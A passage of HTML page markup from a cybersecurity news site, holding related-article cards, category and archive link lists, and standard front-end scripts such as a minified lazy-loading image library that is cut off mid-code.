4zm-1-.004c-.001-.246-.154-.986-.832-1.664C11.516 10.68 10.289 10 8 10c-2.29 0-3.516.68-4.168 1.332-.678.678-.83 1.418-.832 1.664h10z"/></svg> <a href="https://cybernoz.com/author/cybernoz/" rel="author">Cybernoz</a> </span> <span class="cn-card__reading-time"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor"><path d="M8 3.5a.5.5 0 0 0-1 0V8a.5.5 0 0 0 .252.434l3.5 2a.5.5 0 0 0 .496-.868L8 7.71V3.5z"/><path d="M8 16A8 8 0 1 0 8 0a8 8 0 0 0 0 16zm7-8A7 7 0 1 1 1 8a7 7 0 0 1 14 0z"/></svg> 3 min read </span></div><meta itemprop="datePublished" content="2023-10-03T07:58:39+03:00"><meta itemprop="author" content="Cybernoz"></div></article><article class="cn-card post-29096 post type-post status-publish format-standard has-post-thumbnail hentry category-mix" itemscope itemtype="https://schema.org/NewsArticle"><div class="cn-card__image"> <a href="https://cybernoz.com/national-university-of-singapore-taps-students-to-hack-for-good/" aria-hidden="true" tabindex="-1"> <img width="360" height="270" src="https://image.cybernoz.com/wp-content/uploads/2023/05/National-University-of-Singapore-Taps-Students-to-Hack-for-Good.png" class="attachment-cybernoz-card size-cybernoz-card wp-post-image" alt="National University of Singapore Taps Students to Hack for Good" itemprop="image" decoding="async" loading="lazy" /> </a> <a class="cn-card__category" href="https://cybernoz.com/category/mix/">Mix</a></div><div class="cn-card__body"><h3 class="cn-card__title" itemprop="headline"> <a href="https://cybernoz.com/national-university-of-singapore-taps-students-to-hack-for-good/" itemprop="url">National University of Singapore Taps Students to Hack for Good</a></h3><p class="cn-card__excerpt" itemprop="description">With the growing shortage of cybersecurity professionals, universities are increasingly stepping up efforts to develop curricula and opportunities for student engagement around cybersecurity disciplines. Universities…</p><div class="cn-card__meta"> <time datetime="2023-05-04T16:12:38+03:00"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor"><path d="M4 .5a.5.5 0 0 0-1 0V1H2a2 2 0 0 0-2 2v1h16V3a2 2 0 0 0-2-2h-1V.5a.5.5 0 0 0-1 0V1H4V.5zM16 14V5H0v9a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2z"/></svg> May 4, 2023 </time> <span class="cn-card__author"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor"><path d="M8 8a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm2-3a2 2 0 1 1-4 0 2 2 0 0 1 4 0zm4 8c0 1-1 1-1 1H3s-1 0-1-1 1-4 6-4 6 3 6 4zm-1-.004c-.001-.246-.154-.986-.832-1.664C11.516 10.68 10.289 10 8 10c-2.29 0-3.516.68-4.168 1.332-.678.678-.83 1.418-.832 1.664h10z"/></svg> <a href="https://cybernoz.com/author/cybernoz/" rel="author">Cybernoz</a> </span> <span class="cn-card__reading-time"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor"><path d="M8 3.5a.5.5 0 0 0-1 0V8a.5.5 0 0 0 .252.434l3.5 2a.5.5 0 0 0 .496-.868L8 7.71V3.5z"/><path d="M8 16A8 8 0 1 0 8 0a8 8 0 0 0 0 16zm7-8A7 7 0 1 1 1 8a7 7 0 0 1 14 0z"/></svg> 5 min read </span></div><meta itemprop="datePublished" content="2023-05-04T16:12:38+03:00"><meta itemprop="author" content="Cybernoz"></div></article><article class="cn-card post-68485 post type-post status-publish format-standard has-post-thumbnail hentry category-mix" itemscope itemtype="https://schema.org/NewsArticle"><div class="cn-card__image"> <a href="https://cybernoz.com/bugbountyhunter-chats-getting-to-know-0xblackbird-yougina-jtcsec-and-holybugx-by-sean-zseano/" aria-hidden="true" tabindex="-1"> <img width="360" height="270" src="https://image.cybernoz.com/wp-content/uploads/2024/01/BugBountyHunter-Chats-—-Getting-to-know-0xblackbird-YouGina-JTCSec-and.png" class="attachment-cybernoz-card size-cybernoz-card wp-post-image" alt="BugBountyHunter Chats — Getting to know 0xblackbird YouGina JTCSec and" itemprop="image" decoding="async" loading="lazy" /> </a> <a class="cn-card__category" href="https://cybernoz.com/category/mix/">Mix</a></div><div class="cn-card__body"><h3 class="cn-card__title" itemprop="headline"> <a href="https://cybernoz.com/bugbountyhunter-chats-getting-to-know-0xblackbird-yougina-jtcsec-and-holybugx-by-sean-zseano/" itemprop="url">BugBountyHunter Chats — Getting to know 0xblackbird, YouGina, JTCSec and HolyBugx | by Sean (zseano)</a></h3><p class="cn-card__excerpt" itemprop="description">18 min read · Jul 12, 2021 BugBountyHunter.com opened early November 2020 and the amount of growth we have seen in members has been phenomenal!…</p><div class="cn-card__meta"> <time datetime="2024-01-06T14:29:20+03:00"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor"><path d="M4 .5a.5.5 0 0 0-1 0V1H2a2 2 0 0 0-2 2v1h16V3a2 2 0 0 0-2-2h-1V.5a.5.5 0 0 0-1 0V1H4V.5zM16 14V5H0v9a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2z"/></svg> January 6, 2024 </time> <span class="cn-card__author"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor"><path d="M8 8a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm2-3a2 2 0 1 1-4 0 2 2 0 0 1 4 0zm4 8c0 1-1 1-1 1H3s-1 0-1-1 1-4 6-4 6 3 6 4zm-1-.004c-.001-.246-.154-.986-.832-1.664C11.516 10.68 10.289 10 8 10c-2.29 0-3.516.68-4.168 1.332-.678.678-.83 1.418-.832 1.664h10z"/></svg> <a href="https://cybernoz.com/author/cybernoz/" rel="author">Cybernoz</a> </span> <span class="cn-card__reading-time"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor"><path d="M8 3.5a.5.5 0 0 0-1 0V8a.5.5 0 0 0 .252.434l3.5 2a.5.5 0 0 0 .496-.868L8 7.71V3.5z"/><path d="M8 16A8 8 0 1 0 8 0a8 8 0 0 0 0 16zm7-8A7 7 0 1 1 1 8a7 7 0 0 1 14 0z"/></svg> 3 min read </span></div><meta itemprop="datePublished" content="2024-01-06T14:29:20+03:00"><meta itemprop="author" content="Cybernoz"></div></article></div></section><div id="comments" class="cn-comments"></div></div><aside class="cn-sidebar" role="complementary" aria-label="Sidebar"><div id="block-3" class="cn-widget widget_block"><div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow"><h2 class="wp-block-heading">Latest Posts</h2><ul class="wp-block-latest-posts__list wp-block-latest-posts"><li><a class="wp-block-latest-posts__post-title" href="https://cybernoz.com/5-essential-steps-to-bulletproof-your-endpoint-security-and-avoid-the-biggest-mistakes/">5 essential steps to bulletproof your endpoint security (and avoid the biggest mistakes)</a></li><li><a class="wp-block-latest-posts__post-title" href="https://cybernoz.com/friendly-reminder-sat-can-be-enjoyable/">Friendly Reminder: SAT Can Be Enjoyable</a></li><li><a class="wp-block-latest-posts__post-title" href="https://cybernoz.com/european-commission-hack-exposes-data-of-30-eu-entities/">European Commission hack exposes data of 30 EU entities</a></li><li><a class="wp-block-latest-posts__post-title" href="https://cybernoz.com/anthropic-officially-ends-claude-subscriptions-for-third-party-tools-like-openclaw/">Anthropic Officially Ends Claude Subscriptions for Third-Party Tools Like OpenClaw</a></li><li><a class="wp-block-latest-posts__post-title" href="https://cybernoz.com/36-malicious-npm-packages-exploited-redis-postgresql-to-deploy-persistent-implants/">36 Malicious npm Packages Exploited Redis, PostgreSQL to Deploy Persistent Implants</a></li></ul></div></div></div><div id="block-12" class="cn-widget widget_block widget_categories"><ul class="wp-block-categories-list wp-block-categories"><li class="cat-item cat-item-9971"><a href="https://cybernoz.com/category/agbi/">Agbi</a></li><li class="cat-item cat-item-9986"><a href="https://cybernoz.com/category/arstechnica/">ArsTechnica</a></li><li class="cat-item cat-item-9981"><a href="https://cybernoz.com/category/attackdefense/">AttackDefense</a></li><li class="cat-item cat-item-9974"><a href="https://cybernoz.com/category/australiancybersecuritymagazine/">Australiancybersecuritymagazine</a></li><li class="cat-item cat-item-9892"><a href="https://cybernoz.com/category/bankinfosecurity/">Bankinfosecurity</a></li><li class="cat-item cat-item-2"><a href="https://cybernoz.com/category/bleeping-computer/">Bleeping Computer</a></li><li class="cat-item cat-item-9984"><a href="https://cybernoz.com/category/cisoonline/">CISOOnline</a></li><li class="cat-item cat-item-9991"><a href="https://cybernoz.com/category/cloudsecurity/">CloudSecurity</a></li><li class="cat-item cat-item-9891"><a href="https://cybernoz.com/category/computerweekly/">ComputerWeekly</a></li><li class="cat-item cat-item-9983"><a href="https://cybernoz.com/category/crowdstrike/">Crowdstrike</a></li><li class="cat-item cat-item-5821"><a href="https://cybernoz.com/category/cybersecurityventures/">Cyber Security Ventures</a></li><li class="cat-item cat-item-85"><a href="https://cybernoz.com/category/cyberdefensemagazine/">CyberDefenseMagazine</a></li><li class="cat-item cat-item-714"><a href="https://cybernoz.com/category/cybernews/">CyberNews</a></li><li class="cat-item cat-item-9957"><a href="https://cybernoz.com/category/cyberscoop/">Cyberscoop</a></li><li class="cat-item cat-item-4393"><a href="https://cybernoz.com/category/cybersecurity-insiders/">CyberSecurity-Insiders</a></li><li class="cat-item cat-item-9955"><a href="https://cybernoz.com/category/cybersecuritydive/">CyberSecurityDive</a></li><li class="cat-item cat-item-4"><a href="https://cybernoz.com/category/cybersecuritynews/">CyberSecurityNews</a></li><li class="cat-item cat-item-9975"><a href="https://cybernoz.com/category/cyberwire/">CyberWire</a></li><li class="cat-item cat-item-9890"><a href="https://cybernoz.com/category/darkreading/">DarkReading</a></li><li class="cat-item cat-item-863"><a href="https://cybernoz.com/category/exploitone/">ExploitOne</a></li><li class="cat-item cat-item-871"><a href="https://cybernoz.com/category/gbhackers/">GBHackers</a></li><li class="cat-item cat-item-1"><a href="https://cybernoz.com/category/genel/">Genel</a></li><li class="cat-item cat-item-4384"><a href="https://cybernoz.com/category/hackercombat/">HackerCombat</a></li><li class="cat-item cat-item-4380"><a href="https://cybernoz.com/category/hackread/">HackRead</a></li><li class="cat-item cat-item-8604"><a href="https://cybernoz.com/category/helpnetsecurity/">HelpnetSecurity</a></li><li class="cat-item cat-item-9989"><a href="https://cybernoz.com/category/industrialcyber/">IndustrialCyber</a></li><li class="cat-item cat-item-9987"><a href="https://cybernoz.com/category/infosecurity/">InfoSecurity</a></li><li class="cat-item cat-item-9888"><a href="https://cybernoz.com/category/itnews/">ITnews</a></li><li class="cat-item cat-item-109"><a href="https://cybernoz.com/category/itsecurityguru/">ITSecurityGuru</a></li><li class="cat-item cat-item-126"><a href="https://cybernoz.com/category/krebson/">Krebson</a></li><li class="cat-item cat-item-8607"><a href="https://cybernoz.com/category/malwarebytes/">MalwareBytes</a></li><li class="cat-item cat-item-9893"><a href="https://cybernoz.com/category/mix/">Mix</a></li><li class="cat-item cat-item-9990"><a href="https://cybernoz.com/category/otsecurity/">OTSecurity</a></li><li class="cat-item cat-item-5"><a href="https://cybernoz.com/category/portswigger/">PortSwigger</a></li><li class="cat-item cat-item-9982"><a href="https://cybernoz.com/category/rapid7/">Rapid7</a></li><li class="cat-item cat-item-9973"><a href="https://cybernoz.com/category/scmp/">SCMP</a></li><li class="cat-item cat-item-9980"><a href="https://cybernoz.com/category/securelirt/">securelist</a></li><li class="cat-item cat-item-9895"><a href="https://cybernoz.com/category/securityaffairs/">Securityaffairs</a></li><li class="cat-item cat-item-9894"><a href="https://cybernoz.com/category/securityweek/">SecurityWeek</a></li><li class="cat-item cat-item-9985"><a href="https://cybernoz.com/category/techcrunch/">techcrunch</a></li><li class="cat-item cat-item-9889"><a href="https://cybernoz.com/category/thecyberexpress/">TheCyberExpress</a></li><li class="cat-item cat-item-3"><a href="https://cybernoz.com/category/thehackernews/">TheHackerNews</a></li><li class="cat-item cat-item-9993"><a href="https://cybernoz.com/category/threatintelligence-incidentresponse/">ThreatIntelligence-IncidentResponse</a></li><li class="cat-item cat-item-9978"><a href="https://cybernoz.com/category/tldrsec/">Tldrsec</a></li><li class="cat-item cat-item-9979"><a href="https://cybernoz.com/category/unit42/">Unit42</a></li><li class="cat-item cat-item-9992"><a href="https://cybernoz.com/category/vendorresearch/">VendorResearch</a></li><li class="cat-item cat-item-9967"><a href="https://cybernoz.com/category/welivesecurity/">welivesecurity</a></li><li class="cat-item cat-item-707"><a href="https://cybernoz.com/category/wired/">Wired</a></li><li class="cat-item cat-item-9977"><a href="https://cybernoz.com/category/zerosalarium/">Zerosalarium</a></li></ul></div></aside></div></div></main><footer class="cn-footer" role="contentinfo" itemscope itemtype="https://schema.org/WPFooter"><div class="cn-container"><div class="cn-footer__main"><div class="cn-footer__brand"> <a href="https://cybernoz.com/" class="cn-logo" style="color:#fff;"> <span class="cn-logo__icon" aria-hidden="true">☍</span> CyberNoz </a><p>Cybersecurity News</p></div><div><div id="block-15" class="cn-footer-widget widget_block widget_categories"><ul class="wp-block-categories-list wp-block-categories"><li class="cat-item cat-item-9971"><a href="https://cybernoz.com/category/agbi/">Agbi</a></li><li class="cat-item cat-item-9986"><a href="https://cybernoz.com/category/arstechnica/">ArsTechnica</a></li><li class="cat-item cat-item-9981"><a href="https://cybernoz.com/category/attackdefense/">AttackDefense</a></li><li class="cat-item cat-item-9974"><a href="https://cybernoz.com/category/australiancybersecuritymagazine/">Australiancybersecuritymagazine</a></li><li class="cat-item cat-item-9892"><a href="https://cybernoz.com/category/bankinfosecurity/">Bankinfosecurity</a></li><li class="cat-item cat-item-2"><a href="https://cybernoz.com/category/bleeping-computer/">Bleeping Computer</a></li><li class="cat-item cat-item-9984"><a href="https://cybernoz.com/category/cisoonline/">CISOOnline</a></li><li class="cat-item cat-item-9991"><a href="https://cybernoz.com/category/cloudsecurity/">CloudSecurity</a></li><li class="cat-item cat-item-9891"><a href="https://cybernoz.com/category/computerweekly/">ComputerWeekly</a></li><li class="cat-item cat-item-9983"><a href="https://cybernoz.com/category/crowdstrike/">Crowdstrike</a></li><li class="cat-item cat-item-5821"><a href="https://cybernoz.com/category/cybersecurityventures/">Cyber Security Ventures</a></li><li class="cat-item cat-item-85"><a href="https://cybernoz.com/category/cyberdefensemagazine/">CyberDefenseMagazine</a></li><li class="cat-item cat-item-714"><a href="https://cybernoz.com/category/cybernews/">CyberNews</a></li><li class="cat-item cat-item-9957"><a href="https://cybernoz.com/category/cyberscoop/">Cyberscoop</a></li><li class="cat-item cat-item-4393"><a href="https://cybernoz.com/category/cybersecurity-insiders/">CyberSecurity-Insiders</a></li><li class="cat-item cat-item-9955"><a href="https://cybernoz.com/category/cybersecuritydive/">CyberSecurityDive</a></li><li class="cat-item cat-item-4"><a href="https://cybernoz.com/category/cybersecuritynews/">CyberSecurityNews</a></li><li class="cat-item cat-item-9975"><a href="https://cybernoz.com/category/cyberwire/">CyberWire</a></li><li class="cat-item cat-item-9890"><a href="https://cybernoz.com/category/darkreading/">DarkReading</a></li><li class="cat-item cat-item-863"><a href="https://cybernoz.com/category/exploitone/">ExploitOne</a></li><li class="cat-item cat-item-871"><a href="https://cybernoz.com/category/gbhackers/">GBHackers</a></li><li class="cat-item cat-item-1"><a href="https://cybernoz.com/category/genel/">Genel</a></li><li class="cat-item cat-item-4384"><a href="https://cybernoz.com/category/hackercombat/">HackerCombat</a></li><li class="cat-item cat-item-4380"><a href="https://cybernoz.com/category/hackread/">HackRead</a></li><li class="cat-item cat-item-8604"><a href="https://cybernoz.com/category/helpnetsecurity/">HelpnetSecurity</a></li><li class="cat-item cat-item-9989"><a href="https://cybernoz.com/category/industrialcyber/">IndustrialCyber</a></li><li class="cat-item cat-item-9987"><a href="https://cybernoz.com/category/infosecurity/">InfoSecurity</a></li><li class="cat-item cat-item-9888"><a href="https://cybernoz.com/category/itnews/">ITnews</a></li><li class="cat-item cat-item-109"><a href="https://cybernoz.com/category/itsecurityguru/">ITSecurityGuru</a></li><li class="cat-item cat-item-126"><a href="https://cybernoz.com/category/krebson/">Krebson</a></li><li class="cat-item cat-item-8607"><a href="https://cybernoz.com/category/malwarebytes/">MalwareBytes</a></li><li class="cat-item cat-item-9893"><a href="https://cybernoz.com/category/mix/">Mix</a></li><li class="cat-item cat-item-9990"><a href="https://cybernoz.com/category/otsecurity/">OTSecurity</a></li><li class="cat-item cat-item-5"><a href="https://cybernoz.com/category/portswigger/">PortSwigger</a></li><li class="cat-item cat-item-9982"><a href="https://cybernoz.com/category/rapid7/">Rapid7</a></li><li class="cat-item cat-item-9973"><a href="https://cybernoz.com/category/scmp/">SCMP</a></li><li class="cat-item cat-item-9980"><a href="https://cybernoz.com/category/securelirt/">securelist</a></li><li class="cat-item cat-item-9895"><a href="https://cybernoz.com/category/securityaffairs/">Securityaffairs</a></li><li class="cat-item cat-item-9894"><a href="https://cybernoz.com/category/securityweek/">SecurityWeek</a></li><li class="cat-item cat-item-9985"><a href="https://cybernoz.com/category/techcrunch/">techcrunch</a></li><li class="cat-item cat-item-9889"><a href="https://cybernoz.com/category/thecyberexpress/">TheCyberExpress</a></li><li class="cat-item cat-item-3"><a href="https://cybernoz.com/category/thehackernews/">TheHackerNews</a></li><li class="cat-item cat-item-9993"><a href="https://cybernoz.com/category/threatintelligence-incidentresponse/">ThreatIntelligence-IncidentResponse</a></li><li class="cat-item cat-item-9978"><a href="https://cybernoz.com/category/tldrsec/">Tldrsec</a></li><li class="cat-item cat-item-9979"><a href="https://cybernoz.com/category/unit42/">Unit42</a></li><li class="cat-item cat-item-9992"><a href="https://cybernoz.com/category/vendorresearch/">VendorResearch</a></li><li class="cat-item cat-item-9967"><a href="https://cybernoz.com/category/welivesecurity/">welivesecurity</a></li><li class="cat-item cat-item-707"><a href="https://cybernoz.com/category/wired/">Wired</a></li><li class="cat-item cat-item-9977"><a href="https://cybernoz.com/category/zerosalarium/">Zerosalarium</a></li></ul></div></div><div><div class="cn-footer__heading">Archive</div><ul><li><a href='https://cybernoz.com/2026/04/'>April 2026</a></li><li><a href='https://cybernoz.com/2026/03/'>March 2026</a></li><li><a href='https://cybernoz.com/2026/02/'>February 2026</a></li><li><a href='https://cybernoz.com/2026/01/'>January 2026</a></li><li><a href='https://cybernoz.com/2025/12/'>December 2025</a></li><li><a href='https://cybernoz.com/2025/11/'>November 2025</a></li><li><a href='https://cybernoz.com/2025/10/'>October 2025</a></li><li><a href='https://cybernoz.com/2025/09/'>September 2025</a></li><li><a href='https://cybernoz.com/2025/08/'>August 2025</a></li><li><a href='https://cybernoz.com/2025/07/'>July 2025</a></li><li><a href='https://cybernoz.com/2025/06/'>June 2025</a></li><li><a href='https://cybernoz.com/2025/05/'>May 2025</a></li></ul></div><div><div id="block-18" class="cn-footer-widget widget_block"><div class="wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex"><div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow" style="flex-basis:100%"><ul class="wp-block-archives-list wp-block-archives"><li><a href='https://cybernoz.com/2026/04/'>April 2026</a></li><li><a href='https://cybernoz.com/2026/03/'>March 2026</a></li><li><a href='https://cybernoz.com/2026/02/'>February 2026</a></li><li><a href='https://cybernoz.com/2026/01/'>January 2026</a></li><li><a href='https://cybernoz.com/2025/12/'>December 2025</a></li><li><a href='https://cybernoz.com/2025/11/'>November 2025</a></li><li><a href='https://cybernoz.com/2025/10/'>October 2025</a></li><li><a href='https://cybernoz.com/2025/09/'>September 2025</a></li><li><a href='https://cybernoz.com/2025/08/'>August 2025</a></li><li><a href='https://cybernoz.com/2025/07/'>July 2025</a></li><li><a href='https://cybernoz.com/2025/06/'>June 2025</a></li><li><a href='https://cybernoz.com/2025/05/'>May 2025</a></li><li><a href='https://cybernoz.com/2025/04/'>April 2025</a></li><li><a href='https://cybernoz.com/2025/03/'>March 2025</a></li><li><a href='https://cybernoz.com/2025/02/'>February 2025</a></li><li><a href='https://cybernoz.com/2025/01/'>January 2025</a></li><li><a href='https://cybernoz.com/2024/12/'>December 2024</a></li><li><a href='https://cybernoz.com/2024/11/'>November 2024</a></li><li><a href='https://cybernoz.com/2024/10/'>October 2024</a></li><li><a href='https://cybernoz.com/2024/09/'>September 2024</a></li><li><a href='https://cybernoz.com/2024/08/'>August 2024</a></li><li><a href='https://cybernoz.com/2024/07/'>July 2024</a></li><li><a href='https://cybernoz.com/2024/06/'>June 2024</a></li><li><a href='https://cybernoz.com/2024/05/'>May 2024</a></li><li><a href='https://cybernoz.com/2024/04/'>April 2024</a></li><li><a href='https://cybernoz.com/2024/03/'>March 2024</a></li><li><a href='https://cybernoz.com/2024/02/'>February 2024</a></li><li><a href='https://cybernoz.com/2024/01/'>January 2024</a></li><li><a href='https://cybernoz.com/2023/12/'>December 2023</a></li><li><a href='https://cybernoz.com/2023/11/'>November 2023</a></li><li><a href='https://cybernoz.com/2023/10/'>October 2023</a></li><li><a href='https://cybernoz.com/2023/09/'>September 2023</a></li><li><a href='https://cybernoz.com/2023/08/'>August 2023</a></li><li><a href='https://cybernoz.com/2023/07/'>July 2023</a></li><li><a href='https://cybernoz.com/2023/06/'>June 2023</a></li><li><a href='https://cybernoz.com/2023/05/'>May 2023</a></li><li><a href='https://cybernoz.com/2023/04/'>April 2023</a></li><li><a href='https://cybernoz.com/2023/03/'>March 2023</a></li><li><a href='https://cybernoz.com/2023/02/'>February 2023</a></li><li><a href='https://cybernoz.com/2023/01/'>January 2023</a></li><li><a href='https://cybernoz.com/2022/12/'>December 2022</a></li></ul></div></div></div></div></div><div class="cn-footer__bottom"><div> © 2026 <strong>Cybernoz</strong>. All rights reserved.</div><div class="cn-footer__social"></div></div></div></footer> <script type="speculationrules">{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/cybernoz-theme/*","/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}</script> <script id="wp-i18n-js-after" type="litespeed/javascript">wp.i18n.setLocaleData({'text direction\u0004ltr':['ltr']})</script> <script id="contact-form-7-js-before" type="litespeed/javascript">var wpcf7={"api":{"root":"https:\/\/cybernoz.com\/wp-json\/","namespace":"contact-form-7\/v1"},"cached":1}</script> <script type="litespeed/javascript" data-src="https://challenges.cloudflare.com/turnstile/v0/api.js" id="cloudflare-turnstile-js" data-wp-strategy="async"></script> <script id="cloudflare-turnstile-js-after" type="litespeed/javascript">document.addEventListener('wpcf7submit',e=>turnstile.reset())</script> <script data-no-optimize="1">window.lazyLoadOptions=Object.assign({},{threshold:300},window.lazyLoadOptions||{});!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).LazyLoad=e()}(this,function(){"use strict";function e(){return(e=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n,a=arguments[e];for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(t[n]=a[n])}return t}).apply(this,arguments)}function o(t){return e({},at,t)}function l(t,e){return t.getAttribute(gt+e)}function c(t){return l(t,vt)}function s(t,e){return function(t,e,n){e=gt+e;null!==n?t.setAttribute(e,n):t.removeAttribute(e)}(t,vt,e)}function i(t){return s(t,null),0}function r(t){return null===c(t)}function u(t){return c(t)===_t}function d(t,e,n,a){t&&(void 0===a?void 0===n?t(e):t(e,n):t(e,n,a))}function f(t,e){et?t.classList.add(e):t.className+=(t.className?" ":"")+e}function _(t,e){et?t.classList.remove(e):t.className=t.className.replace(new RegExp("(^|\\s+)"+e+"(\\s+|$)")," ").replace(/^\s+/,"").replace(/\s+$/,"")}function g(t){return t.llTempImage}function v(t,e){!e||(e=e._observer)&&e.unobserve(t)}function b(t,e){t&&(t.loadingCount+=e)}function p(t,e){t&&(t.toLoadCount=e)}function n(t){for(var e,n=[],a=0;e=t.children[a];a+=1)"SOURCE"===e.tagName&&n.push(e);return n}function h(t,e){(t=t.parentNode)&&"PICTURE"===t.tagName&&n(t).forEach(e)}function a(t,e){n(t).forEach(e)}function m(t){return!!t[lt]}function E(t){return t[lt]}function I(t){return delete t[lt]}function y(e,t){var n;m(e)||(n={},t.forEach(function(t){n[t]=e.getAttribute(t)}),e[lt]=n)}function L(a,t){var o;m(a)&&(o=E(a),t.forEach(function(t){var e,n;e=a,(t=o[n=t])?e.setAttribute(n,t):e.removeAttribute(n)}))}function k(t,e,n){f(t,e.class_loading),s(t,st),n&&(b(n,1),d(e.callback_loading,t,n))}function A(t,e,n){n&&t.setAttribute(e,n)}function O(t,e){A(t,rt,l(t,e.data_sizes)),A(t,it,l(t,e.data_srcset)),A(t,ot,l(t,e.data_src))}function w(t,e,n){var a=l(t,e.data_bg_multi),o=l(t,e.data_bg_multi_hidpi);(a=nt&&o?o:a)&&(t.style.backgroundImage=a,n=n,f(t=t,(e=e).class_applied),s(t,dt),n&&(e.unobserve_completed&&v(t,e),d(e.callback_applied,t,n)))}function x(t,e){!e||0<e.loadingCount||0<e.toLoadCount||d(t.callback_finish,e)}function M(t,e,n){t.addEventListener(e,n),t.llEvLisnrs[e]=n}function N(t){return!!t.llEvLisnrs}function z(t){if(N(t)){var e,n,a=t.llEvLisnrs;for(e in a){var o=a[e];n=e,o=o,t.removeEventListener(n,o)}delete t.llEvLisnrs}}function C(t,e,n){var a;delete t.llTempImage,b(n,-1),(a=n)&&--a.toLoadCount,_(t,e.class_loading),e.unobserve_completed&&v(t,n)}function R(i,r,c){var l=g(i)||i;N(l)||function(t,e,n){N(t)||(t.llEvLisnrs={});var a="VIDEO"===t.tagName?"loadeddata":"load";M(t,a,e),M(t,"error",n)}(l,function(t){var e,n,a,o;n=r,a=c,o=u(e=i),C(e,n,a),f(e,n.class_loaded),s(e,ut),d(n.callback_loaded,e,a),o||x(n,a),z(l)},function(t){var e,n,a,o;n=r,a=c,o=u(e=i),C(e,n,a),f(e,n.class_error),s(e,ft),d(n.callback_error,e,a),o||x(n,a),z(l)})}function T(t,e,n){var a,o,i,r,c;t.llTempImage=document.createElement("IMG"),R(t,e,n),m(c=t)||(c[lt]={backgroundImage:c.style.backgroundImage}),i=n,r=l(a=t,(o=e).data_bg),c=l(a,o.data_bg_hidpi),(r=nt&&c?c:r)&&(a.style.backgroundImage='url("'.concat(r,'")'),g(a).setAttribute(ot,r),k(a,o,i)),w(t,e,n)}function G(t,e,n){var a;R(t,e,n),a=e,e=n,(t=Et[(n=t).tagName])&&(t(n,a),k(n,a,e))}function D(t,e,n){var a;a=t,(-1<It.indexOf(a.tagName)?G:T)(t,e,n)}function S(t,e,n){var a;t.setAttribute("loading","lazy"),R(t,e,n),a=e,(e=Et[(n=t).tagName])&&e(n,a),s(t,_t)}function V(t){t.removeAttribute(ot),t.removeAttribute(it),t.removeAttribute(rt)}function j(t){h(t,function(t){L(t,mt)}),L(t,mt)}function F(t){var e;(e=yt[t.tagName])?e(t):m(e=t)&&(t=E(e),e.style.backgroundImage=t.backgroundImage)}function P(t,e){var n;F(t),n=e,r(e=t)||u(e)||(_(e,n.class_entered),_(e,n.class_exited),_(e,n.class_applied),_(e,n.class_loading),_(e,n.class_loaded),_(e,n.class_error)),i(t),I(t)}function U(t,e,n,a){var o;n.cancel_on_exit&&(c(t)!==st||"IMG"===t.tagName&&(z(t),h(o=t,function(t){V(t)}),V(o),j(t),_(t,n.class_loading),b(a,-1),i(t),d(n.callback_cancel,t,e,a)))}function $(t,e,n,a){var o,i,r=(i=t,0<=bt.indexOf(c(i)));s(t,"entered"),f(t,n.class_entered),_(t,n.class_exited),o=t,i=a,n.unobserve_entered&&v(o,i),d(n.callback_enter,t,e,a),r||D(t,n,a)}function q(t){return t.use_native&&"loading"in HTMLImageElement.prototype}function H(t,o,i){t.forEach(function(t){return(a=t).isIntersecting||0<a.intersectionRatio?$(t.target,t,o,i):(e=t.target,n=t,a=o,t=i,void(r(e)||(f(e,a.class_exited),U(e,n,a,t),d(a.callback_exit,e,n,t))));var e,n,a})}function B(e,n){var t;tt&&!q(e)&&(n._observer=new IntersectionObserver(function(t){H(t,e,n)},{root:(t=e).container===document?null:t.container,rootMargin:t.thresholds||t.threshold+"px"}))}function J(t){return Array.prototype.slice.call(t)}function K(t){return t.container.querySelectorAll(t.elements_selector)}function Q(t){return c(t)===ft}function W(t,e){return e=t||K(e),J(e).filter(r)}function X(e,t){var n;(n=K(e),J(n).filter(Q)).forEach(function(t){_(t,e.class_error),i(t)}),t.update()}function t(t,e){var n,a,t=o(t);this._settings=t,this.loadingCount=0,B(t,this),n=t,a=this,Y&&window.addEventListener("online",function(){X(n,a)}),this.update(e)}var Y="undefined"!=typeof window,Z=Y&&!("onscroll"in window)||"undefined"!=typeof navigator&&/(gle|ing|ro)bot|crawl|spider/i.test(navigator.userAgent),tt=Y&&"IntersectionObserver"in window,et=Y&&"classList"in 